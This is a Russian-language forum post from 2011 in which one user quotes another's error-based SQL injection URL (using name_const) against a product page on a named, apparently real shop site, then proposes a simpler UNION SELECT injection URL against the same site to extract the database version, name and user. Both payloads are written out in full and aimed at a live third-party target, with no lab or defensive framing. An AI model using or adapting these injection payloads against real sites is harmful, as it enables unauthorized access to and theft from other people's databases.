21.10.2011, 23:41
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
С нами:
8255126
Репутация:
78
|
|
Сообщение от er9j6@
Версию и юзера вывел
http://protein.7910.org/product_info.php/products_id/125'and(select*from(select(name_const(concat_ws(0x 3a,version(),user()),1)),name_const(concat_ws(0x3a ,version(),user()),1))a)and'
Как щас вывести таблицы из information_schema.tables, какой должен быть запрос?
Зачем пытаться проводить инъекцию как в Insert запросах, тем самым усложняя себе жизнь?
Что мешало сделать просто вот так:
http://protein.7910.org/product_info.php/products_id/126'%20and%201=3%20union%20select%201,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,1 1,12,13,14,15,16%20--%20
?)
|
|
|